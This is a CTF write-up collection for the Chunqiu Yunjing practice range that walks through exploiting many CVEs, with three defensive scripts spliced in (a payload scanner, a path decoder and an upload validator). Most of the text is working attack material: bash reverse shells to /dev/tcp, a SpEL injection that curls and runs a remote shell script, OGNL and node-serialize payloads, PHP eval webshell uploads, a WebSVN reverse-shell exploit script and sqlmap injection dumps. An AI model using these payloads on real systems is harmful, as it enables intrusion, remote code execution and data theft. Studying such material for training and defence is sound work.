春秋云镜 (Chunqiu Yunjing) free range: vulnerability collection (continuously updated)
CVE-2017-17405
Target description:
Ruby before 2.4.3 allows Net::FTP command injection.
Approach: base64-encode the reverse-shell command (if it contains a + sign, replace it with %2B), start an FTP server on the VPS and an nc listener on port 80 at the same time, then send the POST request.
0x01 Start FTP on the VPS and listen on port 80
python3 -m pyftpdlib -p 21 -i 0.0.0.0
nc -lvvp 80
0x02 Send the POST request
A shell comes back on success
CVE-2018-1000533
Target description:
GitList is a graphical git repository viewer written in PHP. Version 0.6.0 has a command argument injection issue that leads to remote command execution.
Approach: send the POST request, put the reverse-shell command (shell.sh) in the web directory on the VPS, download it onto the target, then execute it to get the shell back.
0x01 Start a web server on the VPS with shell.sh in the root directory
bash -i >& /dev/tcp/IP/PORT 0>&1
python3 -m http.server 80
0x02 Execute the download command
0x03 The web server logs a GET request
0x04 Execute shell.sh
0x05 The nc listener receives the shell
CVE-2018-12530
Target description:
MetInfo 6.0.0 arbitrary file deletion. Admin password: f2xWcke5KN6pfebu
Approach: delete a file of the CMS so that the CMS can be reinstalled
0x01 Enter the admin panel
Append the admin directory to the target URL (http://eci-2zeibq1vbfl4on2x6vwg.cloudeci1.ichunqiu.com/admin/), enter the credentials (username: admin, password: f2xWcke5KN6pfebu) and log in to the admin panel
0x02 Send a GET request to delete the file; the site enters reinstall mode
0x03 Go through install mode; do not worry if the page reports a database failure
0x04 View the flag
CVE-2017-5941
Target description:
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed to the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript object with an immediately invoked function expression (IIFE).
0x01 Put the payload in the password field
_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >& /dev/tcp/IP/Port 0>&1"')}()
0x02 Submit; the nc listener on the server gets a shell
CVE-2017-5638
Target description:
Smarty 3 before 3.1.32 is vulnerable to PHP code injection when the fetch() or display() functions are called on custom resources that do not sanitize template names.
0x01 Connect directly with AntSword (蚁剑)
http://eci-2ze0v2gvarqi7rlzurk4.cloudeci1.ichunqiu.com/index.php?eval=*/@eval($_POST[%27caidao%27]);/*
CVE-2017-5638
Target description:
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
CVE-2018-1273
Target description:
Spring Data is an open-source framework that simplifies database access and supports cloud services; Spring Data Commons is the base framework shared by all Spring Data sub-projects. Spring Data Commons 2.0.5 and earlier contain a SpEL expression injection vulnerability: an attacker can inject a malicious SpEL expression to execute arbitrary commands.
0x01 Send the POST request that downloads the reverse-shell command
POST /users?page=&size=5 HTTP/1.1
Host: eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
Connection: close
Referer: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080/users/
Upgrade-Insecure-Requests: 1
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://IP/shell.txt -o /tmp/shell.sh")]=admion&password=admin&repeatedPassword=sfasd
0x02 Then execute it
POST /users?page=&size=5 HTTP/1.1
Host: eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Origin: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080
Connection: close
Referer: http://eci-2zej48nv9qi0pkqbdsfh.cloudeci1.ichunqiu.com:8080/users/
Upgrade-Insecure-Requests: 1
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/shell.sh")]=admion&password=admin&repeatedPassword=sfasd
0x03 nc listener
[root@hk5LXA7VR9G6 ~]# nc -lvvp 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 39.106.20.178.
Ncat: Connection from 39.106.20.178:65156.
root@engine-2:/# cat /flag
cat /flag
flag{3c2ddc33-c8fe-4766-8b7b-734645fa634e}root
CVE-2018-16283
Target description:
WordPress Plugin Wechat Broadcast LFI
CVE-2018-7422
Target description:
WordPress Plugin Site Editor LFI
CVE-2022-30887
Target description:
Multi-language Pharmacy Management System (MPMS) is developed in PHP and MySQL. The main purpose of the software is to provide a set of interfaces between the pharmacy and its customers, who are the main users of the software. It helps build a comprehensive database for the pharmacy business and provides various reports based on parameters such as expiry, product and so on. In this CMS, php_action/editProductImage.php has an arbitrary file upload vulnerability, which leads to arbitrary code execution.
0x01 Find the admin password (I got this from other people's writeups too....)
Log in with the account (username: mayuri.infospace@gmail.com, password: mayurik). Some writeups say to download the source code from the official site link; the default account and password are in the SQL database file.
0x02 Find any upload point and upload directly
0x03 Connect to the webshell
Later I found that the account and password are not needed at all: just write the exp and send it directly to get a shell. The request below also uploads it... damn it.
POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2ze4l4xnsjb7pl6du5ur.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------204377828939145669082912249480
Content-Length: 484
Origin: http://eci-2ze4l4xnsjb7pl6du5ur.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze4l4xnsjb7pl6du5ur.cloudeci1.ichunqiu.com/editproduct.php?id=1
Cookie: PHPSESSID=tt0rrdc67e71ge23kavh1c6jtq
Upgrade-Insecure-Requests: 1
-----------------------------204377828939145669082912249480
Content-Disposition: form-data; name="old_image"
tab.jpg
-----------------------------204377828939145669082912249480
Content-Disposition: form-data; name="productImage"; filename="sql1112.php"
Content-Type:
<?php @eval($_POST['shell']);?>
-----------------------------204377828939145669082912249480
Content-Disposition: form-data; name="btn"
-----------------------------204377828939145669082912249480--
CVE-2020-17530
Target description:
A bypass of CVE-2019-0230. The official Struts2 fix for CVE-2019-0230 hardened the OGNL expression sandbox, and CVE-2020-17530 bypasses that sandbox. Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. POST parameter: name :)
0x01 Send the POC directly
POST /index.action HTTP/1.1
Host: eci-2ze93woxli32dqyfqxdt.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 836
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="name"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /flag")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
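The Spring Data, Struts2 and node-serialize requests in the sections above each carry their payload inside an ordinary request body, where the SpEL, OGNL and node-serialize markers are easy to recognise. The script below is an added example (not part of this writeup or of any affected project): it parses form-urlencoded and multipart bodies, percent-decodes them and reports which markers appear in field names and values. The request samples are constructed here, with target.example as a placeholder host.

```python
import re
from urllib.parse import unquote_plus

# Markers of the expression-language payloads used in this collection. The
# regexes are written here for illustration, not taken from any vendor rule set.
SIGNATURES = {
    "spel-bracket-key": re.compile(r"\[\s*#this\b"),                  # username[#this.getClass()...]
    "ognl-forced-eval": re.compile(r"%\{\s*\(?\s*#"),                  # %{(#instancemanager=...
    "reflection-runtime": re.compile(r"java\.lang\.Runtime|getRuntime\(\)\s*\.exec"),
    "node-serialize-iife": re.compile(r"_\$\$ND_FUNC\$\$_"),          # node-serialize function marker
}


def split_body(body: str, content_type: str) -> list:
    """Return (field name, value) pairs for the two body encodings used above;
    any other encoding is returned as one unnamed field so it still gets scanned."""
    if content_type.startswith("application/x-www-form-urlencoded"):
        pairs = []
        for item in body.strip().split("&"):
            key, _, value = item.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
        return pairs
    if content_type.startswith("multipart/form-data"):
        m = re.search(r"boundary=([^;]+)", content_type)
        if not m:
            return [("", body)]
        pairs = []
        for chunk in body.split("--" + m.group(1).strip()):
            chunk = chunk.strip()
            if not chunk or chunk == "--":
                continue                      # preamble or closing delimiter
            head, _, value = chunk.partition("\n\n")
            name = re.search(r'name="([^"]*)"', head)
            pairs.append((name.group(1) if name else "", value.strip()))
        return pairs
    return [("", body)]


def scan_request(raw: str) -> list:
    """Scan one raw HTTP request; return (rule, field:where, snippet) findings.
    Field names are checked as well as values, because the Spring Data payload
    above lives in the key of the form field, not in its value."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    content_type = ""
    for line in head.split("\n")[1:]:
        if line.lower().startswith("content-type:"):
            content_type = line.split(":", 1)[1].strip()
    findings = []
    for name, value in split_body(body, content_type):
        for where, text in (("name", name), ("value", value)):
            for rule, rx in SIGNATURES.items():
                m = rx.search(text)
                if m:
                    findings.append((rule, f"{name or '<body>'}:{where}", text[m.start():m.start() + 40]))
    return findings


def rules_hit(raw: str) -> set:
    """Just the set of rule names that fired for a request."""
    return {rule for rule, _, _ in scan_request(raw)}


# Constructed request samples modelled on the requests above (placeholder host,
# the executed command replaced by a harmless 'id' / 'return 1').
SPEL_REQUEST = (
    "POST /users?page=&size=5 HTTP/1.1\nHost: target.example:8080\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("id")]=admion'
    "&password=admin&repeatedPassword=sfasd\n"
)
OGNL_REQUEST = (
    "POST /index.action HTTP/1.1\nHost: target.example:8080\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX\n\n"
    "------WebKitFormBoundaryX\n"
    'Content-Disposition: form-data; name="name"\n\n'
    '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"])'
    '.(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"])}\n'
    "------WebKitFormBoundaryX--\n"
)
NODE_REQUEST = (
    "POST /login HTTP/1.1\nHost: target.example\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "username=bob&password=_%24%24ND_FUNC%24%24_function()%7Breturn%201%7D()\n"
)
BENIGN_REQUEST = (
    "POST /users?page=&size=5 HTTP/1.1\nHost: target.example:8080\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "username=alice&password=s3cret&repeatedPassword=s3cret\n"
)

if __name__ == "__main__":
    for label, req in (("spel", SPEL_REQUEST), ("ognl", OGNL_REQUEST),
                       ("node", NODE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, scan_request(req))
```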
CVE-2018-20604
Target description:
Leifeng Video CMS (雷风影视CMS) is a video content management program written in PHP on the ThinkPHP 3.2.3 framework, suitable for all kinds of video and film sites. The CMS has a flaw that allows arbitrary file read via admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt.
CVE-2019-9042
Target description:
Sitemagic CMS v4.4 index.php?SMExt=SMFiles has an arbitrary file upload vulnerability; an attacker can upload malicious code to execute system commands
0x01 Log in with admin/admin, then find the upload feature and upload the webshell directly; no need to even capture the request.
0x02 Find the path http://eci-2ze9xeoe2ld28dfmkn22.cloudeci1.ichunqiu.com/files/images/1.php, then connect with Caidao (菜刀)
CVE-2022-23906
Target description:
CMS Made Simple v2.2.15 was found to contain a remote command execution (RCE) vulnerability via the image upload feature. The vulnerability is exploited through a crafted image file.
0x01 Log in with Admin/123456, then visit editusertag.php
0x02 Write the payload in the editor
0x03 Get the flag
CVE-2022-0848
Target description:
part-db RCE
0x01 Open the web page and connect first
0x02 Find the POC and send the request
0x03 Connect with Caidao to http://url.com/data/media/labels/POC.pht and get the flag
CVE-2022-23316
Target description:
taoCMS v3.0.2 has an arbitrary file read vulnerability
0x01 Go to the admin panel at http://url/admin/; a quick search shows the default credentials are admin/tao; log in
0x02 Get the flag directly
CVE-2020-25540
Target description:
ThinkAdmin 6 has a path traversal vulnerability that can be exploited via a GET request with an encoded parameter to read arbitrary files on the remote server.
0x01 Use PHP to construct ../../../flag
<?php
// Convert the path to GBK and write each byte as two base-36 digits;
// this is the transform the vulnerable ThinkAdmin route decodes.
function encode($content)
{
    list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) {
        $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, '0', STR_PAD_LEFT);
    }
    return $chars;
}
$content = "../../../flag";
echo encode($content);
?>
Visit the page
0x02 Put the result in the URL and visit the site
0x03 Base64-decode the data field and submit it
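As an added example (not part of this writeup), a Python port of the PHP encoding above together with its inverse, so an encoded value seen in a request log can be turned back into the path it names and flagged when it walks out of its directory. The access-log lines are constructed, and the /encode/ path segment used to locate the value is an assumption to adapt to your own logs.

```python
import re

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def thinkadmin_encode(path: str) -> str:
    """Same transform as the PHP encode() above: GBK bytes, each written as
    two base-36 digits with a leading zero where needed."""
    return "".join(BASE36[b // 36] + BASE36[b % 36] for b in path.encode("gbk"))


def thinkadmin_decode(encoded: str) -> str:
    """Inverse transform, so a logged parameter can be read as the path it names."""
    if len(encoded) % 2 or not re.fullmatch(r"[0-9a-z]*", encoded):
        raise ValueError("not a well-formed two-digit base-36 string")
    values = [int(encoded[i:i + 2], 36) for i in range(0, len(encoded), 2)]
    if any(v > 255 for v in values):
        raise ValueError("digit pair outside byte range")
    return bytes(values).decode("gbk", errors="replace")


def is_traversal(path: str) -> bool:
    """True when the decoded path leaves its directory (.. segment or absolute path)."""
    norm = path.replace("\\", "/")
    return norm.startswith("/") or any(seg == ".." for seg in norm.split("/"))


# Assumption: the encoded value appears as a path segment after /encode/;
# adjust the pattern to the route layout seen in your own logs.
ENCODED_VALUE = re.compile(r"/encode/([0-9a-z]+)")


def triage_log(lines) -> list:
    """Decode every encoded path in the access-log lines and flag traversal."""
    hits = []
    for line in lines:
        m = ENCODED_VALUE.search(line)
        if not m:
            continue
        try:
            decoded = thinkadmin_decode(m.group(1))
        except ValueError:
            continue                      # not an encoded path after all
        hits.append((decoded, is_traversal(decoded)))
    return hits


# Constructed access-log lines (ROUTE stands in for the real controller path).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2023:09:00:01 +0000] "GET /admin.html?s=ROUTE/encode/'
    + thinkadmin_encode("../../../flag") + ' HTTP/1.1" 200 51',
    '203.0.113.5 - - [12/Jun/2023:09:00:02 +0000] "GET /admin.html?s=ROUTE/encode/'
    + thinkadmin_encode("static/css/app.css") + ' HTTP/1.1" 200 1204',
    '198.51.100.9 - - [12/Jun/2023:09:00:03 +0000] "GET /index.html HTTP/1.1" 200 3210',
]

if __name__ == "__main__":
    print(thinkadmin_encode("../../../flag"))
    for decoded, flagged in triage_log(SAMPLE_LOG):
        print(("TRAVERSAL " if flagged else "ok        ") + decoded)
```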
CVE-2021-34257
Target description:
WPanel is a CMS for building blogs, websites and web applications. WPanel 4 4.3.1 and earlier have a security vulnerability caused by malicious PHP file upload.
0x01 Visit the admin panel at http://url/index/admin/login and log in with admin@admin.com / admin
0x02 Find the vulnerable upload page, http://url/index.php/admin/galleries
0x03 Upload the PHP file
POST /index.php/admin/galleries/add HTTP/1.1
Host: eci-2ze1p8ih20ad2stghnkd.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------5691217863167846249375518708
Content-Length: 861
Origin: http://eci-2ze1p8ih20ad2stghnkd.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze1p8ih20ad2stghnkd.cloudeci1.ichunqiu.com/index.php/admin/galleries/add
Cookie: wpanel_csrf_cookie=88500a11e96b647c80f93a8b627674f1; wpanel_=o32uireutu4ot3fd5rbphr4u5dclp3ca; Profiler=closed
Upgrade-Insecure-Requests: 1
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="wpanel_csrf_token"
88500a11e96b647c80f93a8b627674f1
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="titulo"
123123
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="descricao"
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="tags"
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: application/x-php
<?php @eval($_POST['shell']);?>
-----------------------------5691217863167846249375518708
Content-Disposition: form-data; name="status"
0
-----------------------------5691217863167846249375518708--
Forward, then forward again, and the shell address shows up
0x04 Connect with Caidao and get the flag
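Both the MPMS and the WPanel upload requests above succeed because the server stores whatever filename and Content-Type the client sends. As an added example (not code from either project), a validator that requires the extension, the declared type and the file's own leading bytes to agree, run against constructed parts modelled on those two requests plus a genuine image header and a polyglot:

```python
import re
import secrets

# Allowed image types: extension -> (leading magic bytes, MIME type the client must declare).
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "gif":  (b"GIF8", "image/gif"),
}
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def check_upload(filename: str, declared_type: str, data: bytes) -> tuple:
    """Decide whether one multipart file part may be stored; returns (ok, reason).
    Both CMSs above keep the client-supplied name, so a .php file with an empty
    or made-up Content-Type ends up in the web root. Here the extension, the
    declared type and the file's own leading bytes all have to agree."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]      # drop any path component
    if not name or "\x00" in name or name != name.strip():
        return False, "malformed filename"
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        return False, f"extension '.{ext}' is not an allowed image type"
    magic, mime = ALLOWED[ext]
    if declared_type.strip().lower() != mime:
        return False, f"declared type '{declared_type}' does not match .{ext}"
    if not data.startswith(magic):
        return False, "file content does not match its extension"
    if PHP_TAG.search(data):
        return False, "image contains an embedded PHP tag"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Server-chosen name for an accepted file: random token plus the validated
    extension, never the client's own filename."""
    return f"{secrets.token_hex(8)}.{filename.rsplit('.', 1)[-1].lower()}"


# Constructed file parts: the two uploads from the requests above, a double
# extension, a genuine JPEG header and an image/PHP polyglot.
SAMPLE_PARTS = [
    ("sql1112.php", "", b"<?php @eval($_POST['shell']);?>"),                 # MPMS, empty Content-Type
    ("shell.php", "application/x-php", b"<?php @eval($_POST['shell']);?>"),  # WPanel
    ("shell.php.jpg", "image/jpeg", b"<?php @eval($_POST['shell']);?>"),     # double extension
    ("tab.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16),
    ("pic.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>"),    # polyglot
]


def verdicts(parts=SAMPLE_PARTS) -> list:
    """(filename, accepted?) for each part."""
    return [(name, check_upload(name, ctype, data)[0]) for name, ctype, data in parts]


if __name__ == "__main__":
    for name, ctype, data in SAMPLE_PARTS:
        print(name, check_upload(name, ctype, data))
```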
CVE-2020-26042
Target description:
Hoosk CMS v1.8.0 install/index.php has a SQL injection vulnerability
Details: https://github.com/kr0za/bugs/blob/master/hoosk.md#0x02-install-sqli
0x01 Open the page, capture and send the request (database: mysql, username: root, password: root)
0x02 Write a one-liner webshell into the CMS config.php
0x03 Connect with Caidao and get the flag
CVE-2020-21650
Target description:
MyuCMS is an open-source content management system built with ThinkPHP, a community and shop aggregation with plugins and templates that is lightweight, fast and easy to extend. Version 2.2 has an arbitrary command execution vulnerability in the admin.php/config/add method.
Approach: back-end RCE??? Nonsense. I spent ages on it, capturing packets and looking things up. Complete garbage.
0x01 http://url/index.php/bbs/index/download?url=../../flag&local=1&name
CVE-2021-32305
Target description:
WebSVN is a web-based Subversion repository browser that can show the log of a file or folder, the list of changes to a file, and so on. Insufficient filtering of the search.php?search= parameter leads to RCE.
0x01 Use the POC to send a reverse shell to the VPS and check on the VPS
import sys
import argparse
from urllib.parse import quote_plus

import requests

# Reverse-shell command the vulnerable search.php will run; VPS/PORT are the listener.
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/VPS/PORT 0>&1'"
# The search value is closed with a quote, the command is inserted, and the quote reopened.
REQUEST_PAYLOAD = '/search.php?search=";{};"'

parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()

if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target
else:
    print("[!] Target should start with either http:// or https://")
    sys.exit(1)

requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request sent. Did you get what you wanted?")
CVE-2022-25401
Target description:
Cuppa CMS v1.0 has an arbitrary file read vulnerability in administrator/templates/default/html/windows/right.php
https://github.com/CuppaCMS/CuppaCMS/issues/32
CVE-2022-22909
Target description:
Hotel Druid RCE
https://www.exploit-db.com/exploits/50754
0x01 Find the POC and run it
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 50754.py -t http://eci-2ze02h0t37n6dmflz1m1.cloudeci1.ichunqiu.com --noauth
Exploit By - 0z09e (https://twitter.com/0z09e)
[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://eci-2ze02h0t37n6dmflz1m1.cloudeci1.ichunqiu.com/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://eci-2ze02h0t37n6dmflz1m1.cloudeci1.ichunqiu.com/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
0x02 Once it reports success, capture the request while it runs and you will find it can be done as shown below
CVE-2022-24223
Target description:
AtomCMS SQL injection vulnerability
0x01 Capture the login request and run sqlmap on it
atomcms-sql.txt
POST /admin/login.php HTTP/1.1
Host: eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com/admin/login.php
Cookie: PHPSESSID=ptd7gqki27skss75psisrfpdo6
Upgrade-Insecure-Requests: 1
email=asdfsda%40asdf.com&password=asdf
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r atomcms-sql.txt --dbms=mysql --technique=T --time-sec 2 -D atomcms -T flag --dump
[sqlmap banner: version 1.7.2#stable]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:33:15 /2023-06-12/
[09:33:15] [INFO] parsing HTTP request from 'atomcms-sql.txt'
[09:33:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=asdfsda@asdf.com' AND (SELECT 8192 FROM (SELECT(SLEEP(2)))ekYg) AND 'AUxb'='AUxb&password=asdf
---
[09:33:16] [INFO] testing MySQL
[09:33:16] [INFO] confirming MySQL
[09:33:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[09:33:16] [INFO] fetching columns for table 'flag' in database 'atomcms'
[09:33:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[09:33:19] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[09:33:22] [INFO] retrieved: flag
[09:33:49] [INFO] fetching entries for table 'flag' in database 'atomcms'
[09:33:49] [INFO] fetching number of entries for table 'flag' in database 'atomcms'
[09:33:49] [INFO] retrieved: 1
[09:33:52] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{9fb6a888-fdf4-4a1a-b8cf-1a8c8904462a}
Database: atomcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{9fb6a888-fdf4-4a1a-b8cf-1a8c8904462a} |
+--------------------------------------------+
[09:39:52] [INFO] table 'atomcms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com/dump/atomcms/flag.csv'
[09:39:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zebm2dz673utbomurf5.cloudeci1.ichunqiu.com'
[*] ending @ 09:39:52 /2023-06-12/
CVE-2022-28512
Target description:
Fantastic Blog (CMS) is an absolutely excellent blog/article web content management system. It lets you easily manage your website or blog and offers a wide range of features to customize your blog to your needs. It is powerful enough to get your blog up and running without touching any code. In this CMS, the id parameter of /single.php has a SQL injection vulnerability.
0x01 Run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://eci-2ze18bhk12virk77uea8.cloudeci1.ichunqiu.com/single.php?id=4 -D ctf -T flag --dump
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:51:26 /2023-06-12/
[09:51:26] [INFO] resuming back-end DBMS 'mysql'
[09:51:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4' AND 6714=6714 AND 'AJSM'='AJSM
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=4' AND (SELECT 4457 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT (ELT(4457=4457,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'GOBV'='GOBV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=4' AND (SELECT 5382 FROM (SELECT(SLEEP(5)))nRKA) AND 'cTMS'='cTMS
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=-7760' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x4775647544786d466956776658634c4e75504d6c4c457875515566774e67694671594c7465515172,0x716a706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[09:51:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:51:26] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:51:26] [INFO] fetching entries for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{2667c364-99ad-45fc-94d8-677932c5d39b} |
+--------------------------------------------+
[09:51:27] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze18bhk12virk77uea8.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[09:51:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze18bhk12virk77uea8.cloudeci1.ichunqiu.com'
[*] ending @ 09:51:27 /2023-06-12/
CVE-2022-28060
Target description:
Victor CMS v1.0 /includes/login.php has SQL injection
0x01 Capture the login request and run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
